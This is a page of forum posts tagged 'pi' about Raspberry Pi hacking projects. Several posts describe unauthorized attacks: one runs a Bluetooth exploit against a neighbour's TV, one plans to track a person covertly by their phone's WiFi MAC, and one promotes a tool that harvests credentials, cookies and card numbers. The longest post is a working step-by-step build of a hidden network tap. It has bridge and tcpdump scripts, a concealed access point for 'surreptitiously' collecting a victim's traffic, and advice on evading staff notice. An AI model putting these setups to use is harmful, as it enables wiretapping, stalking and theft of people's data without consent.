Showing results for tags 'pi'.

Found 10 results

  1. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out --->

         sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76
         [!] Pwntools does not support 32-bit Python. Use a 64-bit release.
         [+] Exploit: Done

     Who knows what to do now with this Code?
  2. Does anyone have any fun Raspberry Pi or Pi Zero projects they recommend? I have a few of each laying around, looking for new ideas.
  3. Hi all, I was recently talking with someone regarding Private Investigator work, and the discussion included ways in which one could tell which direction a tailed vehicle/person had turned when you get to a junction and are not certain whether they turned left or right etc. This has given me an idea regarding using the Station MAC of their mobile phone to determine which direction they went. Kind of like a poor man's GSM Directional Finder, but using the target's WiFi signal instead of the actual phone signal. I would like your thoughts on the following, whether you think this would be feasible, and possible best methods if it is. Minimum 2 x directional WiFi antennas in the PI vehicle, one facing forwards and left, one facing forwards and right. Beam widths set so that they are close to each other, but not actually crossing, at the front of the vehicle. A device (RPi / laptop) with both antennas connected. Both antennas in Monitor Mode, using airodump-ng to monitor nearby Station MACs. A script created on the device to read which antenna is picking up a Station MAC with a higher signal strength than the other, and then output this to a screen / phone. Now, presuming the PI is able to get the mobile phone Station MAC of the person being investigated (not massively difficult) and the target has their phone WiFi on (happens often), in theory this method could make following them easier, as even without obvious sight of the vehicle/person ahead, the PI could have at least a rough idea of which direction they are in, in relation to their current position. It could perhaps also be possible to add more antennas, such as in each corner of the vehicle. Would this work? I'm tempted to have a play. Thanks.
  4. Hi all, A relative is a farmer and has a Raspberry Pi set up in a field, that monitors various stuff. He would like to be able to connect to the RPi from the farmhouse, rather than travel down to the field just to get the data from it. The distance is around 1.5 miles from farmhouse to RPi, with a fairly clear line-of-sight (a few sparse trees and potentially the very edge of someone's house). What would be the best way to connect to it? I've considered using a 3G dongle on the RPi and using SSH over the net, or bridging the 2 with a Yagi on each end (pointed at each other). But which would be best, or something else? I have to consider power requirements as well, as at the moment the RPi doesn't take much (its battery can last a good few days), but I don't want connecting extra equipment to it to make it last much less. *edit* I also found this; https://www.cooking-hacks.com/sx1272-lora-shield-for-raspberry-pi-868-mhz Any good? Also, I'm techie-minded, but haven't connected to an RPi using any of these methods before, so any links to tutorials or instructions on how one would go about this would be great. Thank you for your time.
  5. Hi All! I'm currently busy with a project in which I want to use man in the middle attacks to show the vulnerabilities of networking and explicitly phones who automatically connect to a known wifi network. I'm doing this for a school graduation project at an art school in the Netherlands, so I'm not an expert at hacking but I have a bit of experience programming. I want to use this thread to showcase the work I'm going to do, and to gather feedback from people (you boys and girls) far more experienced than me! So, my planning thus far is to set up a development/possible final setup that can do MITM attacks and output this in a graphical way. I would like to use a Raspberry Pi 2B to be the graphical output device and host device for sharing the network with the WiFi Pineapple. The most reliable solution for that would be (I'm guessing) to share the internet from the Raspberry to the Pineapple through a serial interface. What do you think of this setup? Would you share the internet in the same way or choose different hardware altogether? At the moment I'm testing what I can get out of the Pineapple in terms of data, I'm very interested in what way I can best collect this data flowing through the device. I've done some tests with DNS spoofing, which is working pretty decent. Also with Ettercap, TCPDump and SSLStrip. But I noticed that when I use Ettercap or SSLStrip the victim has a very slow connection, could this be because in my test setup I'm using the Pineapple in client mode connected to another wifi? In the end I would like to intercept traffic that confronts the viewer, I don't want to show them their password but maybe scrambled pieces of written text like email, instant messaging usernames etc. I don't want to bluntly show all their data on a screen, and I also don't want to permanently store the data to do harm later on. Do you have tips on what are the best techniques to do this sort of data collecting and is it even possible to read the contents of a packet? I hope you could give me some feedback and direction! Many Thanks!
  6. Hi, I'm working on a rig to use on my security demonstrations without having to drag my laptop to every customer... My thoughts are:

         Internet -> pineapple wlan1
         pineapple wlan0 -> phone
         pineapple eth0
         T
         V
         Raspberry pi eth0

     So I want to ssh from my phone to the Raspberry running Linux... This is possible because eth0 and wlan0 by default are bridged.. So hurray!... Problem is from there... If I set up a honeypot I can't get internet from wlan1... It only provides internet to wlan0... I could connect the Raspberry through my wireless card and in on the wlan0 but it's awfully inconvenient, and does only solve the problems of using updates, Metasploit, nmap and so on.... What I need is a way to get the wlan1 to share its connection to eth0 and at the same time be able to ssh to the Raspberry Pi... Anyone have a suggestion, or have done this in the past?...
  7. Hey everyone! Shadowblade72 and I are proud to present a project we've been working on for months; Hax0rBl0x! This framework is designed to have a central menu that allows you to pick and choose which attacks you want to use in a pentest. These tools are also being designed to function on Backtrack 5 R3 for use with a computer, or for use on a (Pi)neapple attack platform. We also want the ability to add new tools as we produce them. We will be updating this thread from time to time to announce new updates and new capabilities. If you guys have any suggestions, requests, bugs, or anything else, please let us know.

     List of tools:

     - Hax0rBl0x.sh: This is the main menu framework that allows us to add more tools by simply dragging and dropping files.
     - Passive OS Fingerprinting: This is a passive scanner that will read information from passing packets to find OS, Browsers, Apps, Open Ports, uptime, Host type, and manufacturer of each host on the network (or on your pineapple)
     - Cred Harvester (Now with Arpspoofing built in!): This is a tool similar to Easy-Creds or YAMAS, but extremely polished to harvest creds, cookies, social security numbers, or credit card numbers from selected targets. The info is then displayed on an easy to read summary on screen and dumped into an easy to read report for further perusing. The programs launched are Ettercap, SSLStrip, Dsniff, Hamster & Ferret, NGREP, and URLSnarf.

     The link to our code can be found at: http://code.google.com/p/hax0rbl0x/

     NOTE: We are still working on getting the install code working properly as we just switched to Google Projects, so stay tuned!

     EDIT 2/21/2013: A couple of things. We've gotten Google Code working nicely and are working on getting a streamlined install working properly. Also, this tool set has been tested on both BackTrack 5 R3 and the Pi. We make no promises that it will function at all on the pineapple itself.
  8. I was watching the router episode and was wondering about doing the same thing with a Raspberry Pi. I figured I could install a USB NIC and a USB wifi dongle, possibly also hooking up a powered USB hub and adding a hard drive. I also didn't understand what the issue was that Darren had with making his router an access point. I am overall just wondering what the thoughts and concerns are for doing this. Would the 512 ram and 700 MHz processor be good enough for the performance they were trying to create in the episode?
  9. The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for, is way past EOL, hard to find, and under-featured given the current landscape of embedded/SOC offerings. By borrowing some of irongeek's Raspberry Pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my Raspberry Pi. Here's how.

     Hardware:

     - Raspberry Pi Model B
     - 32GB SD Card
     - Belkin 4 port powered USB hub
     - Alfa wifi card (NHA, from the hakshop)
     - USB Ethernet adapter (also from the hakshop)

     OS: Latest image of Raspbian

     Software: All can be apt-get installed

         bridge-utils tcpdump hostapd rfkill zd1211-firmware hostap-utils iw dnsmasq

     Edit /etc/network/interfaces to look like this:

         auto lo
         iface lo inet loopback
         iface eth0 inet dhcp
         iface wlan0 inet static
             address 192.168.0.1
             netmask 255.255.255.0

     Edit /etc/dnsmasq.conf

         # Never forward plain names (without a dot or domain part)
         domain-needed
         # Only listen for DHCP on wlan0
         interface=wlan0
         # Create a dhcp range on your /24 wlan0 network with 12 hour lease time
         dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h

     Edit /etc/hostapd/hostapd.conf (notice it is wpa with the preshared key at /etc/hostapd-psk - the ssid is also hidden)

         interface=wlan0
         driver=nl80211
         ssid=monkey
         channel=1
         auth_algs=1
         wpa=1
         wpa_psk_file=/etc/hostapd-psk
         wpa_key_mgmt=WPA-PSK
         wpa_pairwise=CCMP TKIP
         rsn_pairwise=CCMP
         ignore_broadcast_ssid=1

     Next, create/edit /etc/hostapd-psk

         00:00:00:00:00:00 YourSuperLongAndSecurePasswd

     We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up.

         #!/bin/bash
         # Change settings below to match network
         eth_ip="192.168.1.199"
         eth_netmask="255.255.255.0"
         eth_broadcast="192.168.1.255"

         # Bridge the two wired interfaces
         brctl addbr mybridge
         brctl addif mybridge eth0
         brctl addif mybridge eth1
         ifconfig eth0 0.0.0.0 promisc up
         ifconfig eth1 0.0.0.0 promisc up
         ifconfig mybridge promisc up
         ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast

         # Capture everything crossing eth1 to a pcap file, in the background
         tcpdump -i eth1 -w /root/cap.pcap &

     And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local

         # turn on forwarding
         echo 1 > /proc/sys/net/ipv4/ip_forward
         # enable NAT
         iptables -t nat -A POSTROUTING -j MASQUERADE
         # start the access point
         hostapd -B /etc/hostapd/hostapd.conf

     Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP.

     What it doesn't do: Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want.

     Things to add:

     - Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd.
     - Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file.
     - Add Jasager functionality to the wifi AP (this one's the biggy)
     - Add the all important sslstrip functionality (something I've tried but can't get to work - if there's interest, I'll happily share my findings)
     - Add in Moriarty's awesome new UWUI

     So that's it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here. Long live the interceptor monkey! telot
  10. Hi everyone, PwnPi 3.0 The Pen Test Drop Box distro for the Raspberry Pi has been released! Now packing 200+ pentest tools and added easy setup of reverse connections.

      PwnPi Website : http://pwnpi.net/
      SourceForge page : http://sourceforge.net/projects/pwnpi/
      Screenshot 1 : http://s16.postimage...088ud/image.png
      Screenshot 2 : http://s10.postimage...xui2h/image.png
      Screenshot 3 : http://s16.postimage...p7bgl/image.png
      Direct Download : http://sourceforge.n...img.7z/download
      md5:5d0f146557def874b34ba0a5568d6c32:pwnpi-3.0.img.7z
      username:password:root:toor

      Let me know if you have any questions. Reflex!